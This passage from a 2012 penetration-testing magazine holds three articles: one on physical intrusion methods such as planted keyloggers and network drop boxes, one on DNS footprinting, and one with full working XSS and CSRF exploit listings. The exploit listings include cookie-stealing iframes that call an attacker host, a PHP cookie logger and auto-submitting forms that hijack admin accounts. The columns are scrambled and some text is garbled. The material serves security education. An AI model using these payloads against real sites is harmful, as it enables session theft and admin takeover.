Figure 1. Traffic Lights guarantee security on roads

THE BEST OF 01/2012 Page 102 http://pentestmag.com


how to exploit it. It can include a wide range of exploits, and no alarm how hard is it? If the walls creating your
many being surprisingly simple. Regardless of method, datacenter are just normal drywall it’s more of an illusion
going after physical security in a PenTest often proves of an obstacle. In many situations when someone wants
one of the easiest ways to gain access to a network. your data, it could be easier to just break in. With a cart
Sometimes physical exploits are almost looked on as and a few minutes someone could grab your SAN and
cheating, simply because some of them are so simple, several servers. The target may not necessarily be data
so obvious, and yet completely unprotected. either; it could be a normal thief targeting high value
There are countless tricks to exploit physical layer network equipment. With some network devices costing
weakness. One of the more devious is the concept more than a small house, these devices could easily
of creating a 0-day exploit inside of a client side become financial targets. It’s been a trend for years for
application like Word or Adobe Acrobat, put it on a CD thieves to break in to companies and steal laptops to
or thumb drive labeled Employee Salary History 2005- resell on the internet. They attack over long weekends
2012 and leave a few copies of it in different bathrooms and usually hit several companies in a row. Sometimes
at the target site. Do this slowly several times over a the thief will come in during business hours, and hide in
few months and eventually you’ll have a reverse shell a bathroom or empty office until everyone leaves. The
waiting for you when you get back to the office. question of course is if they can steal your laptops, is
There are tricks like dressing up as a legitimate third there anything physically stopping them from stealing
party vendor like as an electrician, helpdesk employee, your SAN? If they kick a hole through the drywall or
or even a firefighter. Once inside any number of physical push up the ceiling tiles and just jump over the wall, are
exploits are at your disposal. Planting a keylogger when they in? Protecting against things like this requires alarm
under someones desk inspecting a wiring issue is pretty systems. Not just on the front door, but motion sensors in
easy. This sounds improbable, but it works time and time the server rooms. The front door alarm can be bypassed
again. When enough effort is placed into setup, it can by coming in during business hours and hiding, but
be very effective. To increase the odds of success some alarms in the server room should help. Also things like
people will not only dressing the part, they’ll have a 2-3 changing the default lock on server racks(many rack
person team with walkie talkies making chatter. They’ll vendors use the same key for all racks), actually locking
have a Van outside labeled ‘Acme Electrical’ parked in the server racks, encrypting backup tapes and even
front of the receptionist window and they’ll execute the encrypting data on your servers. It’s security in depth.
operation around lunch while all security figures are Physical security can also be more sophisticated
out. Some will argue this is a Social Engineering attack, with knockoff routers, NICs, and motherboards with
but the ultimate exploit will usually be when a physical backdoors hard coded into them. Anti-virus isn’t going
device is planted. Planting a keylogger, planting a to pick up a backdoor on the physical level and even a
wireless router, etc. good IPS sensor isn’t going to pick up a backdoor on
For the more dedicated, there’s the trick of getting a knockoff router. Some companies require every new
a job with the cleaning crew. Your employees have piece of hardware that comes in the door to be tested
background checks, does your cleaning crew? What with a packet sniffer like wireshark to make sure the
about the cleaning crew at your remote offices? A hacker hardware isn’t dialing home. While this may currently be
with a few months of access to every desk in your overkill for normal businesses who buy from reputable
building should make anyone pause. Stopping an attack distributors, buying network devices from ebay for a
like this comes back to the basics. Cameras watching secure environment is a bad idea. Related to this, just
more than just your front door, someone monitoring the because you didn’t install a knockoff WIC into your
cameras, and background checks for anyone who has router doesn’t mean an attacker can’t. Breaking into
unsupervised access inside your building. Secondary a wiring closet and swapping in a hacked WIC into a
to this exploit is the concept of exploiting the people router would take 2 seconds in many environments
who have unsupervised access who aren’t the normal using nothing more than a simple lock pick and a screw
security conscious staff. Telling the cleaning person as driver. It would be noticed as the network goes down,
they’re taking out the trash that you left your keys on your but as the network magically comes back on-line, would
desk could be the easiest access you ever got. anyone take the time to figure it out or would it sit there
Physical security can be even simpler. One of the for years leaking data?
simplest attacks that many people over look is just Network equipment isn’t the only thing at risk from
breaking in and stealing. Smash and grab. Backup tapes physical security. On the end-user side, U3 auto-run
are a good target or even entire servers. If someone memory sticks became popular showing off creativity
wants your data and your front door has a weak lock, in getting access to places that had email and web

THE BEST OF 01/2012 Page 103 http://pentestmag.com


PENTEST EXTRA
security locked down. U3 thumb drives legitimately One of the newest and more interesting attacks is
create a virtual CD that autoplays like all CDs do, with drop boxes like the PwnPlug. This device looks
usually to load software that you want. With a hacked like a benign box that’s simply plugged into power with
U3 thumb drive however, that autoplay virtual CD is a network cable going to it. The type of device that
auto installing backdoors, and dumping password generations of network staff could look at and think
hashes. While seemly trivial, this attack has gotten into I don’t know what it does, but it’s always been there.
the most secure sites in the world. The US Government These devices are physically planted on a network
banned USB devices after having its top secret network and once planted; they allow a hacker or pentester to
compromised by this attack. The Stuxnet worm that have remote access to said network. They talk home
temporarily took down Irans Nuclear Plant was also using SSL to encrypt traffic and bypass perimeter IPS
initially delivered by gaining physical access and sensors. Certain versions have mechanisms to also
plugging in a USB device, bypassing all higher level bypass NAC/802.1x/Radius. Even more devious they
network security mechanisms. A simple AD policy can simply connect back to the attacker using 3G. Hide
blocking autorun should be a minimum for most clients. one of these under a printer and everyone will assume
There are also tools like Ophcrack where if you have it’s just related to the printer. Three or four years of easy
physical access to a computer, you can boot with a access will follow with the device likely being thrown out
linux live CD and crack the local admin password with with the printer when the printer is end of life. The small
zero knowledge, zero effort, and zero skill. While this form factor is a big part of the danger in these devices.
may not seem like the end of the world, how many end Gone are the days of a drop box needing to be a laptop
user computers have the same local admin password? that anyone can easily spot.
What about HR computers? Obviously no one in IT While the thought of losing a $500 device might stop
with domain admin access has the same local admin some hackers from using this type of attack, losing a $40
password that the end users have… Secondary, it’s device will stop no one. This is where the svartkast comes
just as easy to install a rootkit with a live CD as it is in. A svartkast is the concept of a cheap remote access
to break the local admin password. Protecting against drop box that you can plant on a network and afford
this requires the security team to create computer build loses. One example is using a pogoplug. A pogoplug is
policies for helpdesk technicians to follow when building a legitimate home media device that cost around $40.
end-user laptops and desktops. Polices setting the boot You can use it to share pictures of your vacation, or you
order to boot off the hard drive first, creating a bios can use it to hack into a network. The default operating
password, and locking the bios from changes. system is thrown out for a custom install of Linux. Install
Even more simple than breaking the password on a your tools, ssh tunneled through Tor, and you’re done.
laptop with a boot CD are tools like FTWAutoPwn that You now have a very dangerous device.
allows someone with physical access to simply bypass It takes a few minutes for the seriousness of this
the password all together on a locked Windows XP or type of attack to set in. Someone breaks in, plants this
Windows 7 computer. This attack is also very simple device and leaves. All you know is a break-in happened
requiring the attacker to create a FireWire hack device and nothing was stolen. But from now on, when you
using the FTWAutoPwn program, and then simply plug forget to patch your 5 year old copy of Netbackup, you
the modified firewire device into a locked computer. No just lost all your data. The PwnPlugs and svartkast
more password… One of the more scary things about boxes aren’t sniffing data; they’re a hacker sitting on the
attacks like this is how simple they are and how it can inside of your network running all the tools they want.
be used to pivot to other attacks. Outside of just gaining That legacy server with MS03-026 that isn’t an issue
access to an end users laptop, doing this to a domain because it’s behind the perimeter firewall? Think again.
admin who locks his computer to go to lunch could gain Remote offices are often left out of physical security
someone a new AD account. conversations. Remote offices can be overlooked,
underfunded and easy targets for all of the above
attacks. Using any of the above physical security exploits
against a satellite office will produce much better result
in general than attacking the corporate datacenters.
The corporate headquarters may be locked down with
cameras, guards, and network engineers monitoring
fine details. How many small remote offices can you
Figure 2. U3 USB Thumb Drive, used to break into some of the most same the same of? Many times remote offices have no
secure networks in the world IT staff at all.

THE BEST OF 01/2012 Page 104 http://pentestmag.com


Some people may think the cloud will save them from
these attacks, but if anything the more companies adopt
the cloud, the worse the issue of physical security may
be. More servers in the cloud will likely equal smaller
budgets for internal IPS systems and the project time
to maintain them. Under high cloud adoption scenarios
where fewer higher level engineers are on site, there
is little to protect the attacks above. This may sound
counter intuitive as the initial thought is that the data
in the cloud is guarded by the best and brightest
and therefore more secure. The problem is that the
access to that data is still taking place from the same
physical locations it was before. Planting a pwnplug in
a business without an IT staff could guarantee decades
of unnoticed access.
Another thought many have when thinking about
securing the physical layer is that they’re not a big
enough target for a hacker to go out of their way for.
They might be concerned about a generic worm, but
not someone breaking in and planting a PwnPlug. The
problem is what’s thought of as a traditional hacker
is many times not the most likely attacker. The most
likely attacker in many companies is the disgruntled
employee. Disgruntled IT employee has always been
a fear for businesses, but as the next generations of
more and more computer savvy employees enter the
workforce, their ability to find and launch relatively
simplistic, but highly effective attacks will be a concern.
The idea of an intern with a svartkast, or an employee
bypassing the password on their boss’s computer is a
real possibility.
So how do you protect against physical security, and
more specifically the more dangerous PwnPlugs and
svartkasts? Using something like Cisco Port Security
where the switch knows what mac address is allowed to
be on each port would be a good first try. The problem is
the PwnPlug can bypass this. They can mimic the mac
address if installed in-line with a PC or printer. Using

Figure 3. PwnPlug with a decoy sticker to make it look like a printer


power supply

THE BEST OF 01/2012 105


PENTEST EXTRA
perimeter will be encrypted leaving the perimeter IPS
sensor ineffective. For an internal IPS system to work
though means custom configuration to look for internal
hackers. Just downloading the latest IPS signatures
isn’t necessarily going to give the tools needed. There
will need to be staff trained on creating rules and the
time to monitoring normal traffic, test rules, and develop
rules as techniques change. In addition to an internal
IPS sensor, using internal honeypots is a good way to
quickly detect new activity. For honeypots, set up a few
virtual servers that look like real targets named things
like HR015, or DC005 and have tripwire or the IPS
watch them and alert in real time.
Figure 4. Pogoplug home media devices are a popular choice used In addition to detecting these attacks, it’s also smart
to make a svartkast box to reduce the internal attack surface area to lessen the
NAC/802.1x/Radius would be another good guess, but damage done between when an attack is detected and
the PwnPlug can bypass that as well in the higher end when it’s remediated. That comes back to the old adage
models. For smaller companies, simply doing a periodic of not having an egg network with a hard shell outside and
visual check would be a good idea. The problem is a soft gooey inside. Make the internal network as locked
something like a PwnPlug could easily be connected down and hard as the outside network. The network ports
to a small UPS battery backup and put up in the ceiling outside of the core switch should only see a small subset
where it could run for days; long enough to allow a of servers and only a small subset of ports on those
hacker to exploit an internal system for more permanent servers. For example, end users should never be able to
access. Also relying on visual checks ignores the fact see netbackup ports on any server. A telephone doesn’t
that these devices will continue to get smaller and need to see file servers. A printer doesn’t need to see other
smaller. Some of the devices in the pipeline are the size wan links. Locking down internal systems is key.
of a network jack. One thing many companies are doing in response to
Protecting against the initial planting of a device on newer physical threats is having pentests preformed
your network really comes down to the old basics of on the inside of the network, and attacked from the
physical security. Cameras, fences, alarms systems, perspective that there’s a hacker on a pwnplug. Doing
security guards, policies, background checks, etc. There this will pick up security issues that may have been
are also the deterrents like keeping unused switch ports overlooked otherwise. Second, after all internal issues
shutdown by default, and monitoring mac-addresses. found are fixed; perform the test again being as quiet as
To detect devices like the PwnPlug after they’re on possible to test the alerts and alarms for sensitivity. This
your network, scanning for it will not work; physically also allows the client to see what hack attempts on the
looking for it isn’t a guaranteed method either. Even if inside looks like in terms of what alerts they get.
there was a trick to detect the device using a network If anything, physical attacks prove there is no single
scanner, the assumption should be that very soon we’ll magic bullet that can protect you. The best defense
have dozens of similar products with each generation has always been, and always will be, staff with proper
being more covert. Instead the best way to detect the security education to continuously harden systems
device is to think in terms of how to detect the actions against emerging threats.
of the hacker on the device. While many companies
do an okay job of looking at the perimeter for hack JON DERRENBACKER
attempts, also turn your attention to the inside. You Jon Derrenbacker is an IT professional with 12 years
should be alerted to things like nmap scans hitting experience in Systems Engineering, 8 years experience in
inside servers, or private being incorrectly guessed as Computer Forensics and 8 years experience in Pen-Testing. In
your snmp community string, or outbound connections computer forensics he has lead small cases to cases scaling
to TOR or to hacker tool repositories where an attacker $100 million dollar international fraud. In PenTesting his
could be pulling updates. Basically, anything that could focus is on community banks, but includes for privately- and
be seen as an inside hack, you should be alerted to publicly-held companies, not for pro�t organizations, and
in real time. In many cases, an internal IPS sensor is government agencies. Jon is a systems engineer for KeiterCpa
more valuable and useful than an external IPS. With in Richmond Va. You can reach him at
these attacks most outbound traffic that leaves the jderrenbacker@keitercpa.com

THE BEST OF 01/2012 Page 106 http://pentestmag.com


107
PENTEST EXTRA

XSS & CSRF


Practical exploitation of post-authentication
vulnerabilities in web applications

These days many people do not consider post-authentication


vulnerabilities dangerous, such as Stored XSS in the
administrator’s portion of a web application.

T
his situation is probably aggravated by some • Only 32% of post-authenticated vulnerabilities were
misinformation websites and some self- fixed during the first and second quarter of 2011.
proclaimed security experts, which try to deny • However, 65% were fixed during the third and
disclosed vulnerabilities by posing them as a feature fourth quarter of 2011.
implemented by design. The problem is that they simply
do not understand the exploitation’s vectors of these The goal of this article is to demonstrate the real
vulnerabilities and they consider them as benign, as danger of post-authenticated vulnerabilities. We will
long as they impact webpages which do not remain not explain the basics of web application attacks in
available to unauthenticated users. this article, as that has already been done many times
In the past year, High-Tech Bridge SA Security before by others. We will focus on a practical way to
Research Lab has been performing vendor awareness exploit post-authentication XSS’s and CSRF, which
on a non-profit bases, explaining that post-authentication remain a highly underestimated attack vector in the
vulnerabilities are dangerous and they should be fixed. security scene.
This case-by-case approach is paying off by vendor’s
patch statistics for our Security Advisories: Post-authentication XSS
Let’s start with something very simple. One of the
most popular post-authentication vulnerabilities is
XSS (Cross Site Scripting). This type of vulnerability
is a perfect attack against web-site administrators.
Actually, despite the limited exploitation’s vector
(against website administrators only), our Research
Lab assigns a medium risk level (for a standard XSS)
to these vulnerabilities for the simple reason that the
most efficient exploitation vector of XSS is carried out
against website administrators, not against common
users.
For our example, we will take an old version of
Figure 1. Testing the Proof of Concept Zikula, which is vulnerable to XSS against website

THE BEST OF 01/2012 Page 108 http://pentestmag.com


administrator vulnerability (details are described in our • 1.jpeg is a normal JPG file with is used as a simple
Security Advisory HTB23039). Several months ago, the birthday card picture.
vulnerability was rapidly patched by the vendor, and • 1.jpg shows the 1.jpeg picture to simulate a simple
today we are going to demonstrate the full version of image behavior. However, an invisible part in the
the exploit. victim’s browser will create an iframe, which will
First of all let’s test the Proof of Concept (PoC) code exploit the XSS vulnerability inside the admin panel.
from the advisory to make sure that the vulnerability • c.php script simply writes received administrator’s
exists. We log into Zikula as an administrator and cookie to the log.txt file.
test by using the proof of concept, which was publicly
disclosed on High-Tech Bridge’s website: Figure 1. Next we have to have the logged-in administrator to
XSS works perfectly; we see the value of our cookie. visit our hackhost website to steal his cookies. Here,
Now let’s see how this vulnerability may be exploited we will not write a complex scenario, as there are
in practice. Let’s imagine that a malicious hacker has already plenty of social engineering attack examples
a website located at http://hackhost/. Our vulnerable on Internet. Indeed, we will use a very basic one, as
website with Zikula is located at http://targethost/. if a website user (malicious hacker in reality) wants to
We have the following files: wish a happy birthday to the administrator.
The administrator receives a Birthday Card, which
• The .htaccess file causes Apache to handle JPG is located at: http://hackhost/1.jpg, the JPG extension
files as PHP scripts. This will make the malicious will not seem suspicious to the majority of users. On
link that we are going to send to the administrator the image below we see what the administrator will see
less suspicious. after opening the link in his browser: Figure 2.

Listing 1. Content of web root of hackhost

root@hackserver:/var/www/hackhost# ls -la
drwxrwxrwx 2 root root 4096 2012-01-01 00:00 .
drwxrwxrwx 17 root root 4096 2012-01-01 00:00 ..
-rw-rw-rw- 1 root root 277694 2012-01-01 00:00 1.jpeg
-rw-rw-rw- 1 root root 288 2012-01-01 00:00 1.jpg
-rw-rw-rw- 1 root root 78 2012-01-01 00:00 c.php
-rw-rw-rw- 1 root root 37 2012-01-01 00:00 .htaccess

root@hackserver:/var/www/hackhost# cat .htaccess


AddType application/x-httpd-php .jpg

root@hackserver:/var/www/hackhost# cat 1.jpg


<html>
<body>
<img src="1.jpeg">
<iframe width="1" height="1" style="display:none"
src="http://targethost/index.php?module=theme&type=admin&func=setasdefault&themename=<script>document.location
.href='http://hackhost/c.php?c='%2Bescape(document.cookie)</script>">
</body>
</html>

root@hackserver:/var/www/hackhost# cat c.php


<?
$f=fopen("log.txt", "a");
fwrite($f, $_GET["c"]."\r\n");
fclose($f);
?>

THE BEST OF 01/2012 Page 109 http://pentestmag.com


PENTEST EXTRA

Figure 2. Image displayed in browser

As soon as the logged administrator sees this image,


his admin account is compromised. Let’s come back
to our hackhost and have a look on what we just
received:

Figure 4. Modifying admin cookie


root@hackserver:/var/www/hackhost# cat log.txt
_zsid2=655085aceec73b6e3aacb230a344bc88f169c20d; details are described in our HTB22913 Security
Advisory), which was also patched by the vendor
Perfect, we now have administrator’s cookie. Let’s go several months ago.
back to the vulnerable http://targethost/: Figure 3. Our target will again be located at http://targethost/
We have not logged into the system, so we do not with the vulnerable version 1.0.11 of UseBB. To exploit
have any rights. Now, let’s modify our admin cookie, this vulnerability, we will need a slightly modified version
using the FireCookie plug-in for Firebug in Firefox and of our http://hackhost/ used in the previous XSS case.
use the intercepted Session ID of the administrator: We can see a new file named form.hml designed to
Figure 4. perform CSRF exploitation. Again, we have to make a
Refresh the page with the new cookie enabled, and logged UseBB administrator visit our malicious image
go to the administration portion of the web site: Figure located at http://hackhost/1.jpg. Here is what the
5. exploited UseBB administrator will see when the link is
We are now logged-in as the Zikula administrator with opened: Figure 6.
full rights. This is a very simple example, but it is a very As previously mentioned, there is nothing here which
common exploitation attempt for post-authentication really looks suspicious – this is simply a birthday card,
XSS vulnerabilities, which are quite often wrongly which is coming from a forum member. However, as
considered as benign by unaware people. soon as the administrator opens the link, his Profile’s

Client side attack through CSRF


Another example of post-authenticated vulnerability is
CSRF or XSRF, (Cross Site Request Forgery). Let’s
take the example of the CSRF vulnerability, which was
discovered in a previous version of UseBB (vulnerability

Figure 3. Lack of access Figure 5. Gain Access

THE BEST OF 01/2012 Page 110 http://pentestmag.com


Listing 2. Files and their content in hackhost’s web root

root@hackserver:/var/www/hackhost# ls -la
drwxrwxrwx 2 root root 4096 2012-01-01 00:00 .
drwxrwxrwx 8 root root 4096 2012-01-01 00:00 ..
-rw-rw-rw- 1 root root 50935 2012-01-01 00:00 1.jpeg
-rw-rw-rw- 1 root root 118 2012-01-01 00:00 1.jpg
-rw-rw-rw- 1 root root 1109 2012-01-01 00:00 form.html
-rw-rw-rw- 1 root root 38 2012-01-01 00:00 .htaccess

root@hackserver:/var/www/hackhost# cat .htaccess


AddType application/x-httpd-php .jpg

root@hackserver:/var/www/hackhost# cat 1.jpg


<html>
<body>
<img src=1.jpeg>
<iframe width="1" height="1" style="display:none" src="form.html">
</body>
</html>

<html>
<body>
<form action="http://targethost/panel.php?act=editprofile" method="post" name="main" id="main">
<input type="hidden" name="displayed_name" value="admin">
<input type="hidden" name="real_name" value="">
<input type="hidden" name="avatar_remote" value="">
<input type="hidden" name="birthday_month" value="">
<input type="hidden" name="birthday_day" value="">
<input type="hidden" name="birthday_year" value="">
<input type="hidden" name="location" value="">
<input type="hidden" name="website" value="">
<input type="hidden" name="occupation" value="">
<input type="hidden" name="interests" value="">
<input type="hidden" name="signature" value="">
<input type="hidden" name="email" value="hacker@hack.host">
<input type="hidden" name="msnm" value="">
<input type="hidden" name="yahoom" value="">
<input type="hidden" name="aim" value="">
<input type="hidden" name="icq" value="">
<input type="hidden" name="jabber" value="">
<input type="hidden" name="skype" value="">
<input type="submit" value="OK">
</form>
<script>
document.main.submit();
</script>
</body>
</html>

THE BEST OF 01/2012 Page 111 http://pentestmag.com


PENTEST EXTRA

Figure 8. Receiving the administrator’s password

Figure 6. Suspicious Happy Birthday


combination of XSS and CSRF together, as in many others
High-Tech Bridge’s advisories. Usually, vendors do not
email will be changed to hacker@hack.host by our implement CSRF protection in their administration scripts,
form.html CSRF code, as if it was the real administrator because they may consider it useless. Sometimes, it may
who legitimately changed his email address by using be true and sometimes not. If developers miss an XSS
the designed function of UseBB: Figure 7. somewhere, then they are faced with a cocktail, which
Now we simply need to use UseBB password may open a door to full system compromise.
recovery feature to get a new administrator password In the present case, the vulnerable script allows the
on hacker@hack.host email: Figure 8. website administrator to create a custom field for user
After receiving the administrator’s password by email, profiles. One of the script parameters named user_
we can log as UseBB administrator: Figure 9. include is vulnerable to Stored XSS. The complexity is
This is a very simple example of CSRF, but it is a that the vulnerable field is edited and displayed on two
quite efficient proof of concept and the reason why this different pages. This inaccurately makes some people
vulnerability was reported to the vendor, who in turn believe that such a vulnerability is not dangerous at all.
agreed that it was a serious issue by providing a new So let’s start exploiting it.
release to his customers. We will again consider that the vulnerable version
of e107 is located at http://targethost/ and that the
When CSRF combines with XSS hacker’s server is located at http://hackhost/, content
Now, let’s have a look at a more complex exploit using a of which will be similar to our previous examples with
hybrid approach, which relies on both XSS and CSRF. classic post-authenticated XSS and CSRF.
In this example, we will use the CSRF and stored XSS In this case 1.jpg is a little bit more complex and
vulnerabilities in the admin panel of e107. Details performs 3 different actions:
are described in our Security Advisory HTB23004,
and these vulnerabilities have also been fixed by the • It shows a legitimate Happy Birthday image (1.jpeg)
vendor. • An invisible iframe is included in form.html, which
One of the scripts (users_extended.php) in the exploits the CSRF vulnerability and adds new field
e107 administrator panel, is vulnerable to stored XSS, with malicious Javascript code inside that steals the
(Persistent XSS), as well as to CSRF attacks. In this case, user’s cookie (this is possible because our script is
a simple XSS in the script, without the CSRF would be vulnerable to XSS).
pretty useless from an attacker’s point of view. In a same • Two seconds after loading form.html, 1.jpg will
way, the script would not represent a big value for hackers request the users_extended.php, script with stored
if it was only vulnerable to CSRF, because the vulnerable XSS attack code (inserted in step 2).
code does not perform any critical or sensitive actions,
such as the password change that we used in our previous
CSRF example. However in this case, we have a perfect

Figure 7. Getting new password Figure 9. Logging as UseBB administrator

THE BEST OF 01/2012 Page 112 http://pentestmag.com


Listing 3. A content of hackerhost web root

root@hackserver:/var/www/hackhost# ls -la
итого 80
drwxrwxrwx 2 root root 4096 2012-01-01 00:00 .
drwxrwxrwx 11 root root 4096 2012-01-01 00:00 ..
-rw-rw-rw- 1 root root 50935 2012-01-01 00:00 1.jpeg
-rw-rw-rw- 1 root root 259 2012-01-01 00:00 1.jpg
-rw-rw-rw- 1 root root 78 2012-01-01 00:00 c.php
-rw-rw-rw- 1 root root 846 2012-01-01 00:00 form.html
-rw-rw-rw- 1 root root 38 2012-01-01 00:00 .htaccess
root@hackserver:/var/www/hackhost# cat .htaccess
AddType application/x-httpd-php .jpg

root@hackserver:/var/www/hackhost# cat 1.jpg


<html>
<body>
<img src=1.jpeg>
<iframe width="1" height="1" style="display:none" id=f1 src='form.html'></iframe>
<script>
setTimeout("document.getElementById('f1').src='http://targethost/e107_admin/users_extended.php'",2000);
</script>
</body>
</html>

root@hackserver:/var/www/hackhost# cat form.html


<form method="POST" action="http://targethost/e107_admin/users_extended.php?editext" name=m>
<input type="hidden" name="user_field" value="abcde1f1">
<input type="hidden" name="user_text" value="12121">
<input type="hidden" name="user_type" value="1">
<input type="hidden" name="user_include" value=""><script>document.location.href='http://hackhost/c.php?c='+esca
pe(document.cookie);</script>">
<input type="hidden" name="add_field" value="1">
<input type="hidden" name="user_parent" value="0">
<input type="hidden" name="user_required" value="0">
<input type="hidden" name="user_applicable" value="255">
<input type="hidden" name="user_read" value="0">
<input type="hidden" name="user_write" value="253">
<input type="hidden" name="user_hide" value="0">
<input type=submit>
</form>
<script>
document.m.submit();
</script>

root@hackserver:/var/www/hackhost# cat c.php


<?
$f=fopen("log.txt", "a");
fwrite($f, $_GET["c"]."\r\n");
fclose($f);
?>

THE BEST OF 01/2012 Page 113 http://pentestmag.com


PENTEST EXTRA

Figure 10. Dangerous Birthday Card

Listing 4. XSS example

root@hackserver:/var/www/hackhost# cat log.txt


PHPSESSID=a688a485f2ddb7a5ce40610e58d686ce;
e107_tdOffset=-8; e107_tdSetTime=1325883584;
e107_tzOffset=-240; e107cookie=1.f1f19cd495328ce023b
ed1c0d5108d2a;

Here is our malicious link that a log e107 administrator


whould open: http://hackhost/1.jpg.
As before, the administrator will not see any suspicious
activities, except the Birthday Card: Figure 10.
However, both XSS and CSRF vulnerabilities were Figure 12. Unlimited access
successfully exploited. As we have already seen in the
XSS example, e107 administrator’s cookie will be passed being implemented by application design and may
to c.php, which will store it in the log.txt file: Listing 4. become an entry point on your system. Moreover, XSS
Also, we can now simply edit the cookie and refresh and CSRF, despite highly underestimated on certain
the page and you have exploited the administrator’s security websites and during most penetration tests, do
page! We are now logged as the e107 admin. remain a target of choice in the real world.
We now have access to all of the administrative We hope that this article will improve vendor and
functions and unlimited control of the e107. user awareness regarding the real dangers of post-
authentication vulnerabilities though client-side attack
Conclusion vectors.
The three client-side attacks described in this article We would also like to highlight the efforts of Secunia,
show that post-authenticated vulnerabilities are also who educates a lot to vendor’s and user’s awareness
dangerous, despite the fact they do not impact webpages about post-authentication vulnerabilities.
available to non-authenticated users. They are far from

MARSEL NIZAMUTDINOV
Marsel Nizamutdinov, Head of Research & Development
Department at High-Tech Bridge SA, web application security
expert, author of „Hacker Web Exploitation Uncovered”
Figure 11. Exploiting the administrator’s page (2005).

THE BEST OF 01/2012 Page 114 http://pentestmag.com


������������������������
����������������������
���������������������
��������������������
����������������������
�������������������
���������������
����������
PENTEST EXTRA

Finding your
Target...
Network foot printing is, perhaps, the first active step in the
recognisance phase of an external network security engagement.
This phase is often highly automated with little human interaction
as the techniques appear, at first glance, to be easily applied in a
general fashion across a broad range of targets.

A
s a security analyst, footprinting is also one of data provides the best current view of the target, but the
the most enjoyable parts of my job as I attempt information could change tomorrow as new sites are
to outperform the automatons; it is all about brought online, or old sites are taken offline. Thus as a
finding that one target that everybody forgot about or did datum is found that could expand the footprint, a new
not even know they had, that one old IIS 5 webserver iteration of the footprinting process triggers with that
that is not used, but not powered off. datum as the seed, and the results are combined with
With this article I am going to share some of the steps, all discovered information.
tips and tricks that pentesters and hackers alike use
when starting on a engagement. Know your target
The very first thing to do is to get to know your target
Approach organization. What they do, who they do it for, who
As with most things in life having a good approach to does it for them, where they do it from both online
a problem will yield better results and overtime as your and in the kinetic world, what community or charity
approach is refined you will consume less time while work they are involved in. This will give you and
getting better results. By following a methodology, your insight into what type of network/infrastructure you
footprinting will become more repeatable and thus reliable. can expect. Reading public announcements, financial
A basic footprining methodology covers reconnaisance, reports and any other documents published on or by
DNS mining, various information services (e.g. whois, the organization might also yield interesting results.
Robtex, routes), network registration information and For any organization that must publish regular reports
active steps such as SSL host enumeration. (e.g. listed companies), these are a treasure trove of
While the temptation exists to merely feed a information for understanding the target’s core business
domainname into a tool or script and take the output as units, corporate hierarchy and lines of business. All
your completed footprint, this will not yield a passable these become very useful when selecting targets.
footprint for two reasons. Firstly, a single tool will not Dumpster diving, if you are up for it and have physical
have access to all the disparate information sources access to the target, means sifting through trash to get
that one should consult, and secondly the footprinting useful information, but in recent times social media
process is inherently iterative and continous. A footprint can provide us with even more. Sites like LinkedIn,
is almost never complete; instead, a fork of the footprint Facebook and Twitter can provide you with lists of

THE BEST OF 01/2012 Page 116 http://pentestmag.com


employees, projects that the organization is involved target organization. To determine whether a domain
with and perhaps even information about third party exists or not, one should examine the SOA (start of
products and suppliers that are in use. authority) DNS record for the domain. Using commands
One should even keep an eye out for evidence of like nslookup under MicroSoft Windows or dig/host
previous breaches or loss of credentials. It has become commands under most of the *nix family will reveal SOA
common place for hackers to post information about records. Using dig, dig zonetransfer.me soa.
security breaches on sites like pastebin.com. The If, by veryfing the SAO, it is confirmed that the domain
most likely evidence would be credentials in the form exists, then the next step is to track down who it belongs
of corporate emails and passwords being reused on to. At this point the whois service is called upon. Whois
unrelated sites that are hacked, and have their user is simply a registry that contains the information of the
databases uploaded. In addition developers use sites like owner of a domain. Note that it is not entirely reliable
Pastebin to share code, ideas and patches, and if you are and certainly not consistent. The following very simple
lucky you might just find a little snipped of code that will query whois zonetransfer.me provides us with the
give you the edge sitting out in the open, on Pastebin. owner of the domain zonetransfer.me detail.
After finding domains, running them through the TLD
DNS expand and verifying their whois information, it is time
The Domain Name System (DNS) is a hierarchical distributed to track down hosts. First we need to get the NS or
naming system for computers, services, or any resource name server records for the domains. Again using dig
connected to the Internet or a private network. – WikiPedia zonetransfer.me ns returns a list of all the name servers
used by this domain. In many cases the name server
In a nutshell, DNS is used to convert computer names will not be part of the target’s network and is often out-
to their numeric addresses. of-scope, but they will still be used in the next step.
Start by enumerating every possible domains owned DNS yields much interesting information, but the
by the target. This is where the information from the initial default methods for extracting information from foreign
reconnaissance phase comes in handy, as the target’s servers effectively relies on a brute force. However,
website will likely point to external domains of interest DNS supports a trick whereby the all DNS information
and also help you guess at possible names. With a list for a zone can be downloaded if the server allows it, and
of the most discovered domains in hand, move on to a this is called a zone transfer. When enabled, they are
TLD (Top level domain) expand. TLDs are the highest extremely useful as they negate the need for guessing
level subdomains in DNS; .com, .net, .za, .mobi are all or brute-forcing; sadly they are commonly disabled.
examples of TLDs (The Mozilla Organization maintains Still, given the usefullness of zone transfers it is always
a list of TLDs https://wiki.mozilla.org/TLD_List). worth testing for. Zone transfers are performed against
In this step, we take a discovered dicovered domain name servers that is specified in the NS records of a
and check to see if there are any other domains with domain, and it is also important to perform this against
the same name, but with a different TLD. For example, all the name servers in the list. While the data contained
if the target has the domain victim.com, test whether in each name server should be the same, the security
the domains victim.net, victim.info, victim.org etc. exist configuration might be different. Using dig, the following
and if they exist check to see if they are owned by our command will attemp to perform a zone transfer dig axfr
@ns12.zoneedit.com zonetransfer.me.

Figure 1. Using dig to get the SOA (Start of authority) record for a
domain Figure 2. Using whois to get the domain owner detail

THE BEST OF 01/2012 Page 117 http://pentestmag.com


PENTEST EXTRA
As mentioned previously, zone transfers are not that tools, Fierce, is a perl script written by RSnake (http://
common. When we cannot download the zone file, there ha.ckers.org/fierce/), which is an easy to use tool with
are a couple of other tricks that might work. One is to many useful functions. Additionally, there tools like
brute force or guess host names: by using a long list of Paterva’s Maltego and SensePost’s Yeti which provide
common hostnames one can test for names such as graphical tools for this purpose.
fw.victim.com, intranet.victim.com, mail.victim.com and If we happen to have a list of IP addresses or IP
so on. The names can be commonly seen hostnames, netblocks of the target, then a further DNS trick is to
generated names when computers are assigned convert the addresses into hostnames using reverse
numeric or algorithmic names, or from sets of related lookups to get the PTR record entry. This is useful since
names such as characters from a book series. When reverse records are easily brute forced in IPv4. Bear in
brute forcing DNS, be sure to check the following DNS mind that DNS does not require a PTR record (reverse
records: CNAME, A and AAAA. Again this is easy using entry) or that entries in the reverse zone match entries
a tool like dig. dig www.google.com a produces the DNS in the forward zone.
configuration for www.google.com, note that the hostname To test once more, try using dig, dig 104.66.194.173.in-
www.google.com actually has multiple DNS entries, one addr.arpa ptr. While this too can be easily automated,
